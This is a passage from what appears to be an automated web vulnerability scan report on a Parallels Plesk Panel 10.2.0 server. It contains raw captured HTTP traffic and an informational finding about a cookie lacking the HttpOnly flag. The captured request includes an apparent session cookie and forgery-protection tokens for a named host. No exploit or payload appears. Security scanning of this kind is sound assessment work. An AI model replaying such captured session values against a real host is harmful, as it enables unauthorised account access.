Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:26 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:26 GMT
Connection: close
Content-Length: 11772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fshared-ssl%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Master SSL Domain</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.shared-ssl/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function change_sharedSSL_oC(o1, o2)
           {
               o2.disabled = !o1.checked;
           }
           function check_oC(f)
           {
               return true;
           }
           function update_oC(f)
           {
               if (!check_oC(f))
                   return false;
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/shared-ssl/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <fieldset>
   <legend><input type="checkbox" class="checkbox" name="sharedSSL_enabled" id="fid-sharedSSL_enabled" value="true" onClick="change_sharedSSL_oC(this, document.forms[0].domainName)" DISABLED> <label for="fid-sharedSSL_enabled">Switch on shared SSL</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">
   
       <tr>
           <td class="name"><label for="fid-domainName">Domain name of a site whose SSL certificate will be shared among other sites</label>&nbsp;<span class="required">*</span></td>
           <td>None</td>
       </tr>
       


   </table>

</td></tr></table></fieldset>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.36. http://vulnerable.plesk.control.panel.20110407.20:8880/spaw/spaw.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /spaw/spaw.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spaw/spaw.php HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:09:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:09:20 GMT
Connection: close
Content-Length: 70449

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="bdaafe67daaa200e2f077bd9577b09f4" id="forgery_protection_token" name="forgery_protection_token">
       <link rel="shortcut icon" href="/favicon.ico">
       <title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script language="javascript" type="text/javascript" src="/javascript/main.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/chk.js.php?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/widget.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script language="javascript" type="text/javascript" src="/javascript/tooltip.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script language="javascript" type="text/javascript" src="/javascript/jsw.js?plesk_version=psa-10.2.0-20110407.20"></script>
       
       
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->


       <script type="text/javascript">
<!--
function _body_onload()
{
   turnAutocompleteOff();
   loff();
   var std_context = 'spaw';
   SetHelpPrefix('cl/'); SetContext(std_context, '');
   
   save_as_oC(document.forms[0]);
   try {
       if (top && top.leftFrame) {
           SetExpandLeftFrame();
       }
   } catch (e) { }
}

function _body_resize()
{
}

function _body_onunload()
{
   lon();
   
}


var opt_no_frames = false;
var opt_integrated_mode = false;
               function _key_hadler_onkeypress(e)
               {
                   var event = e ? e : window.event;
                   var target = e ? event.target : event.srcElement;
                   var key = event.keyCode;

                   if (navigator.appName == "Netscape" &&
                       (navigator.platform.indexOf("Mac") == -1 && key == 112 && navigator.userAgent.indexOf("Safari") == -1 ||
                       navigator.platform.indexOf("Mac") > -1 && key == 63236)
                   ) { OpenHelpWindow(); return false; };

                   try {
           if (key == "13") {
               if (target && (target.type == "button" || target.type == "textarea"))
                   return true;
               bt = document.getElementById("bid-ok");
               if (navigator.appName == "Netscape")
               {
                   if (bt) bt.onclick();
               }
               else
               {
                   if (bt)    bt.click();
               }
               return false;}if (key == "27") {
               bt = document.getElementById("bid-cancel");
               if (navigator.appName == "Netscape")
               {
                   if (bt) bt.onclick();
               }
               else
               {
                   if (bt)    bt.click();
               }
               return false;}
                   } catch (e) {
                   }
                   return true;
               }
               if (document.layers) document.captureEvents(Event.KEYPRESS);
               document.onkeypress = _key_hadler_onkeypress;
           

           function save_as_oC(f)
           {
               f.save_as_file.disabled = !f.save_as.checked;
           }

           function reload_oC(f)
           {
               f.cmd.value = "reload";
               lsubmit(f);
               return false;
           }

           function update_oC(f)
           {
               try {
                   SPAW_UpdateFields();
               } catch (e) {
               }
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

       
//-->
       </script>


   </head>
   <body onLoad="_body_onload();" onUnload="_body_onunload();" onResize="_body_resize();" onHelp="OpenHelpWindow(); return false;" id="mainCP" class=" ">
   <a href="#" name="top" id="top"></a>
   <table width="100%" cellspacing="0" cellpadding="0" border="0" id="pageLayout"><tr><td id="screenWH">
   <div class='titleWrapper'>
       <div class="pathbar clear"><span class="pathbarItem"><a href="/plesk/client@/dashboard/">Home</a></span><SPAN class="pathbarItem separator">&gt;</SPAN><span class="pathbarItem"><a href="/plesk/hosting-panel=web.view/">Websites &amp; Domains</a></span><SPAN class="pathbarItem separator">&gt;</SPAN><span class="pathbarItem"><a href="/plesk/client@/domain@1/hosting/file-manager/">File manager</a></span><SPAN class="pathbarItem separator">&gt;</SPAN></div>
       
       <div class="screenTitle">
           <table width="100%" cellspacing="0">
           <tr>
               <td class="title">
                   <div class='titleContainer clear'><h1>WYSIWYG editor: <span class="name">/httpdocs/index.html</span></h1></div>
                   
                   
               </td>

               <td class="toolbar">
                   <div class="toolbarWrapper">
                       <div class="toolbarItems">
                           <table cellspacing="0">
                               <tr>
                               <td><div class="toolbarBtn" id="bid-up-level"><A name="up_level" id="up_level" href="/plesk/client@/domain@1/hosting/file-manager/" onClick=";lon();"><span>Up Level</span></a></div></td>
                               </tr>
                           </table>
                       </div>
                   </div>
               </td>

           </tr>
           </table>
       </div>
   </div>
   <div class="screenBody" id="">
       <div id="warnings"></div>
       
       <form action="/spaw/spaw.php" method="POST" onSubmit="this.submit();">
<div class="formArea">
   <fieldset>
       <legend>Edit file <span class="name">/httpdocs/index.html</span></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
       
       <table class="formFields" cellspacing="0">
           <tr>
               <td class="name">View the original file in the following encoding: </td>
               <td><select name="load_codepage" id="fid-load_codepage" >    <option value='437'>437</option>
   <option value='850'>850</option>
   <option value='852'>852</option>
   <option value='855'>855</option>
   <option value='857'>857</option>
   <option value='860'>860</option>
   <option value='861'>861</option>
   <option value='862'>862</option>
   <option value='863'>863</option>
   <option value='865'>865</option>
   <option value='866'>866</option>
   <option value='869'>869</option>
   <option value='ANSI_X3.4-1968'>ANSI_X3.4-1968</option>
   <option value='ANSI_X3.4-1986'>ANSI_X3.4-1986</option>
   <option value='ARABIC'>ARABIC</option>
   <option value='ARMSCII-8'>ARMSCII-8</option>
   <option value='ASCII'>ASCII</option>
   <option value='ASMO-708'>ASMO-708</option>
   <option value='BIG-5'>BIG-5</option>
   <option value='BIG-FIVE'>BIG-FIVE</option>
   <option value='BIG5'>BIG5</option>
   <option value='BIG5-HKSCS'>BIG5-HKSCS</option>
   <option value='BIG5HKSCS'>BIG5HKSCS</option>
   <option value='BIGFIVE'>BIGFIVE</option>
   <option value='C99'>C99</option>
   <option value='CN'>CN</option>
   <option value='CN-BIG5'>CN-BIG5</option>
   <option value='CN-GB'>CN-GB</option>
   <option value='CP-GR'>CP-GR</option>
   <option value='CP1125'>CP1125</option>
   <option value='CP1133'>CP1133</option>
   <option value='CP1250'>CP1250</option>
   <option value='CP1251'>CP1251</option>
   <option value='CP1252'>CP1252</option>
   <option value='CP1253'>CP1253</option>
   <option value='CP1254'>CP1254</option>
   <option value='CP1255'>CP1255</option>
   <option value='CP1256'>CP1256</option>
   <option value='CP1257'>CP1257</option>
   <option value='CP1258'>CP1258</option>
   <option value='CP1361'>CP1361</option>
   <option value='CP367'>CP367</option>
   <option value='CP437'>CP437</option>
   <option value='CP737'>CP737</option>
   <option value='CP775'>CP775</option>
   <option value='CP819'>CP819</option>
   <option value='CP850'>CP850</option>
   <option value='CP852'>CP852</option>
   <option value='CP853'>CP853</option>
   <option value='CP855'>CP855</option>
   <option value='CP857'>CP857</option>
   <option value='CP858'>CP858</option>
   <option value='CP860'>CP860</option>
   <option value='CP861'>CP861</option>
   <option value='CP862'>CP862</option>
   <option value='CP863'>CP863</option>
   <option value='CP864'>CP864</option>
   <option value='CP865'>CP865</option>
   <option value='CP866'>CP866</option>
   <option value='CP869'>CP869</option>
   <option value='CP874'>CP874</option>
   <option value='CP932'>CP932</option>
   <option value='CP936'>CP936</option>
   <option value='CP949'>CP949</option>
   <option value='CP950'>CP950</option>
   <option value='CSASCII'>CSASCII</option>
   <option value='CSEUCKR'>CSEUCKR</option>
   <option value='CSEUCPKDFMTJAPANESE'>CSEUCPKDFMTJAPANESE</option>
   <option value='CSGB2312'>CSGB2312</option>
   <option value='CSHPROMAN8'>CSHPROMAN8</option>
   <option value='CSIBM855'>CSIBM855</option>
   <option value='CSIBM857'>CSIBM857</option>
   <option value='CSIBM860'>CSIBM860</option>
   <option value='CSIBM863'>CSIBM863</option>
   <option value='CSIBM864'>CSIBM864</option>
   <option value='CSIBM865'>CSIBM865</option>
   <option value='CSIBM866'>CSIBM866</option>
   <option value='CSIBM869'>CSIBM869</option>
   <option value='CSISO14JISC6220RO'>CSISO14JISC6220RO</option>
   <option value='CSISO2022CN'>CSISO2022CN</option>
   <option value='CSISO2022JP'>CSISO2022JP</option>
   <option value='CSISO2022JP2'>CSISO2022JP2</option>
   <option value='CSISO2022KR'>CSISO2022KR</option>
   <option value='CSISOLATIN1'>CSISOLATIN1</option>
   <option value='CSISOLATIN2'>CSISOLATIN2</option>
   <option value='CSISOLATIN3'>CSISOLATIN3</option>
   <option value='CSISOLATIN4'>CSISOLATIN4</option>
   <option value='CSISOLATIN5'>CSISOLATIN5</option>
   <option value='CSISOLATIN6'>CSISOLATIN6</option>
   <option value='CSISOLATINARABIC'>CSISOLATINARABIC</option>
   <option value='CSISOLATINCYRILLIC'>CSISOLATINCYRILLIC</option>
   <option value='CSISOLATINGREEK'>CSISOLATINGREEK</option>
   <option value='CSISOLATINHEBREW'>CSISOLATINHEBREW</option>
   <option value='CSKOI8R'>CSKOI8R</option>
   <option value='CSMACINTOSH'>CSMACINTOSH</option>
   <option value='CSPC775BALTIC'>CSPC775BALTIC</option>
   <option value='CSPC850MULTILINGUAL'>CSPC850MULTILINGUAL</option>
   <option value='CSPC862LATINHEBREW'>CSPC862LATINHEBREW</option>
   <option value='CSPC8CODEPAGE437'>CSPC8CODEPAGE437</option>
   <option value='CSPCP852'>CSPCP852</option>
   <option value='CSSHIFTJIS'>CSSHIFTJIS</option>
   <option value='CSUCS4'>CSUCS4</option>
   <option value='CSUNICODE'>CSUNICODE</option>
   <option value='CYRILLIC'>CYRILLIC</option>
   <option value='ECMA-114'>ECMA-114</option>
   <option value='ECMA-118'>ECMA-118</option>
   <option value='ELOT_928'>ELOT_928</option>
   <option value='EUC-CN'>EUC-CN</option>
   <option value='EUC-JP'>EUC-JP</option>
   <option value='EUC-KR'>EUC-KR</option>
   <option value='EUC-TW'>EUC-TW</option>
   <option value='EUCCN'>EUCCN</option>
   <option value='EUCJP'>EUCJP</option>
   <option value='EUCKR'>EUCKR</option>
   <option value='EUCTW'>EUCTW</option>
   <option value='GB18030'>GB18030</option>
   <option value='GB2312'>GB2312</option>
   <option value='GBK'>GBK</option>
   <option value='GB_1988-80'>GB_1988-80</option>
   <option value='GEORGIAN-ACADEMY'>GEORGIAN-ACADEMY</option>
   <option value='GEORGIAN-PS'>GEORGIAN-PS</option>
   <option value='GREEK'>GREEK</option>
   <option value='GREEK8'>GREEK8</option>
   <option value='Georgian-Academy'>Georgian-Academy</option>
   <option value='Georgian-PS'>Georgian-PS</option>
   <option value='HEBREW'>HEBREW</option>
   <option value='HP-ROMAN8'>HP-ROMAN8</option>
   <option value='HZ'>HZ</option>
   <option value='IBM367'>IBM367</option>
   <option value='IBM437'>IBM437</option>
   <option value='IBM775'>IBM775</option>
   <option value='IBM819'>IBM819</option>
   <option value='IBM850'>IBM850</option>
   <option value='IBM852'>IBM852</option>
   <option value='IBM855'>IBM855</option>
   <option value='IBM857'>IBM857</option>
   <option value='IBM860'>IBM860</option>
   <option value='IBM861'>IBM861</option>
   <option value='IBM862'>IBM862</option>
   <option value='IBM863'>IBM863</option>
   <option value='IBM864'>IBM864</option>
   <option value='IBM865'>IBM865</option>
   <option value='IBM866'>IBM866</option>
   <option value='IBM869'>IBM869</option>
   <option value='ISO-2022-CN'>ISO-2022-CN</option>
   <option value='ISO-2022-CN-EXT'>ISO-2022-CN-EXT</option>
   <option value='ISO-2022-JP'>ISO-2022-JP</option>
   <option value='ISO-2022-JP-1'>ISO-2022-JP-1</option>
   <option value='ISO-2022-JP-2'>ISO-2022-JP-2</option>
   <option value='ISO-2022-KR'>ISO-2022-KR</option>
   <option value='ISO-8859-1'>ISO-8859-1</option>
   <option value='ISO-8859-10'>ISO-8859-10</option>
   <option value='ISO-8859-13'>ISO-8859-13</option>
   <option value='ISO-8859-14'>ISO-8859-14</option>
   <option value='ISO-8859-15'>ISO-8859-15</option>
   <option value='ISO-8859-16'>ISO-8859-16</option>
   <option value='ISO-8859-2'>ISO-8859-2</option>
   <option value='ISO-8859-3'>ISO-8859-3</option>
   <option value='ISO-8859-4'>ISO-8859-4</option>
   <option value='ISO-8859-5'>ISO-8859-5</option>
   <option value='ISO-8859-6'>ISO-8859-6</option>
   <option value='ISO-8859-7'>ISO-8859-7</option>
   <option value='ISO-8859-8'>ISO-8859-8</option>
   <option value='ISO-8859-9'>ISO-8859-9</option>
   <option value='ISO-CELTIC'>ISO-CELTIC</option>
   <option value='ISO-IR-100'>ISO-IR-100</option>
   <option value='ISO-IR-101'>ISO-IR-101</option>
   <option value='ISO-IR-109'>ISO-IR-109</option>
   <option value='ISO-IR-110'>ISO-IR-110</option>
   <option value='ISO-IR-126'>ISO-IR-126</option>
   <option value='ISO-IR-127'>ISO-IR-127</option>
   <option value='ISO-IR-138'>ISO-IR-138</option>
   <option value='ISO-IR-14'>ISO-IR-14</option>
   <option value='ISO-IR-144'>ISO-IR-144</option>
   <option value='ISO-IR-148'>ISO-IR-148</option>
   <option value='ISO-IR-157'>ISO-IR-157</option>
   <option value='ISO-IR-166'>ISO-IR-166</option>
   <option value='ISO-IR-179'>ISO-IR-179</option>
   <option value='ISO-IR-199'>ISO-IR-199</option>
   <option value='ISO-IR-203'>ISO-IR-203</option>
   <option value='ISO-IR-226'>ISO-IR-226</option>
   <option value='ISO-IR-57'>ISO-IR-57</option>
   <option value='ISO-IR-6'>ISO-IR-6</option>
   <option value='ISO646-CN'>ISO646-CN</option>
   <option value='ISO646-JP'>ISO646-JP</option>
   <option value='ISO646-US'>ISO646-US</option>
   <option value='ISO_646.IRV:1991'>ISO_646.IRV:1991</option>
   <option value='ISO_8859-1'>ISO_8859-1</option>
   <option value='ISO_8859-10'>ISO_8859-10</option>
   <option value='ISO_8859-10:1992'>ISO_8859-10:1992</option>
   <option value='ISO_8859-14'>ISO_8859-14</option>
   <option value='ISO_8859-14:1998'>ISO_8859-14:1998</option>
   <option value='ISO_8859-15'>ISO_8859-15</option>
   <option value='ISO_8859-15:1998'>ISO_8859-15:1998</option>
   <option value='ISO_8859-16'>ISO_8859-16</option>
   <option value='ISO_8859-1:1987'>ISO_8859-1:1987</option>
   <option value='ISO_8859-2'>ISO_8859-2</option>
   <option value='ISO_8859-2:1987'>ISO_8859-2:1987</option>
   <option value='ISO_8859-3'>ISO_8859-3</option>
   <option value='ISO_8859-3:1988'>ISO_8859-3:1988</option>
   <option value='ISO_8859-4'>ISO_8859-4</option>
   <option value='ISO_8859-4:1988'>ISO_8859-4:1988</option>
   <option value='ISO_8859-5'>ISO_8859-5</option>
   <option value='ISO_8859-5:1988'>ISO_8859-5:1988</option>
   <option value='ISO_8859-6'>ISO_8859-6</option>
   <option value='ISO_8859-6:1987'>ISO_8859-6:1987</option>
   <option value='ISO_8859-7'>ISO_8859-7</option>
   <option value='ISO_8859-7:1987'>ISO_8859-7:1987</option>
   <option value='ISO_8859-8'>ISO_8859-8</option>
   <option value='ISO_8859-8:1988'>ISO_8859-8:1988</option>
   <option value='ISO_8859-9'>ISO_8859-9</option>
   <option value='ISO_8859-9:1989'>ISO_8859-9:1989</option>
   <option value='JAVA'>JAVA</option>
   <option value='JIS_C6220-1969-RO'>JIS_C6220-1969-RO</option>
   <option value='JOHAB'>JOHAB</option>
   <option value='JP'>JP</option>
   <option value='KOI8-R'>KOI8-R</option>
   <option value='KOI8-RU'>KOI8-RU</option>
   <option value='KOI8-T'>KOI8-T</option>
   <option value='KOI8-U'>KOI8-U</option>
   <option value='L1'>L1</option>
   <option value='L2'>L2</option>
   <option value='L3'>L3</option>
   <option value='L4'>L4</option>
   <option value='L5'>L5</option>
   <option value='L6'>L6</option>
   <option value='L7'>L7</option>
   <option value='L8'>L8</option>
   <option value='LATIN1'>LATIN1</option>
   <option value='LATIN2'>LATIN2</option>
   <option value='LATIN3'>LATIN3</option>
   <option value='LATIN4'>LATIN4</option>
   <option value='LATIN5'>LATIN5</option>
   <option value='LATIN6'>LATIN6</option>
   <option value='LATIN7'>LATIN7</option>
   <option value='LATIN8'>LATIN8</option>
   <option value='MAC'>MAC</option>
   <option value='MACARABIC'>MACARABIC</option>
   <option value='MACCENTRALEUROPE'>MACCENTRALEUROPE</option>
   <option value='MACCROATIAN'>MACCROATIAN</option>
   <option value='MACCYRILLIC'>MACCYRILLIC</option>
   <option value='MACGREEK'>MACGREEK</option>
   <option value='MACHEBREW'>MACHEBREW</option>
   <option value='MACICELAND'>MACICELAND</option>
   <option value='MACINTOSH'>MACINTOSH</option>
   <option value='MACROMAN'>MACROMAN</option>
   <option value='MACROMANIA'>MACROMANIA</option>
   <option value='MACTURKISH'>MACTURKISH</option>
   <option value='MACUKRAINE'>MACUKRAINE</option>
   <option value='MS-ANSI'>MS-ANSI</option>
   <option value='MS-ARAB'>MS-ARAB</option>
   <option value='MS-CYRL'>MS-CYRL</option>
   <option value='MS-EE'>MS-EE</option>
   <option value='MS-GREEK'>MS-GREEK</option>
   <option value='MS-HEBR'>MS-HEBR</option>
   <option value='MS-TURK'>MS-TURK</option>
   <option value='MS_KANJI'>MS_KANJI</option>
   <option value='MacThai'>MacThai</option>
   <option value='MuleLao-1'>MuleLao-1</option>
   <option value='NEXTSTEP'>NEXTSTEP</option>
   <option value='R8'>R8</option>
   <option value='ROMAN8'>ROMAN8</option>
   <option value='SHIFT-JIS'>SHIFT-JIS</option>
   <option value='SHIFT_JIS'>SHIFT_JIS</option>
   <option value='SJIS'>SJIS</option>
   <option value='TCVN'>TCVN</option>
   <option value='TCVN-5712'>TCVN-5712</option>
   <option value='TCVN5712-1'>TCVN5712-1</option>
   <option value='TCVN5712-1:1993'>TCVN5712-1:1993</option>
   <option value='TIS-620'>TIS-620</option>
   <option value='TIS620'>TIS620</option>
   <option value='TIS620-0'>TIS620-0</option>
   <option value='TIS620.2529-1'>TIS620.2529-1</option>
   <option value='TIS620.2533-0'>TIS620.2533-0</option>
   <option value='UCS-2'>UCS-2</option>
   <option value='UCS-2-INTERNAL'>UCS-2-INTERNAL</option>
   <option value='UCS-2BE'>UCS-2BE</option>
   <option value='UCS-2LE'>UCS-2LE</option>
   <option value='UCS-4'>UCS-4</option>
   <option value='UCS-4-INTERNAL'>UCS-4-INTERNAL</option>
   <option value='UCS-4BE'>UCS-4BE</option>
   <option value='UCS-4LE'>UCS-4LE</option>
   <option value='UHC'>UHC</option>
   <option value='UNICODEBIG'>UNICODEBIG</option>
   <option value='UNICODELITTLE'>UNICODELITTLE</option>
   <option value='US'>US</option>
   <option value='US-ASCII'>US-ASCII</option>
   <option value='UTF-16'>UTF-16</option>
   <option value='UTF-16BE'>UTF-16BE</option>
   <option value='UTF-16LE'>UTF-16LE</option>
   <option value='UTF-32'>UTF-32</option>
   <option value='UTF-32BE'>UTF-32BE</option>
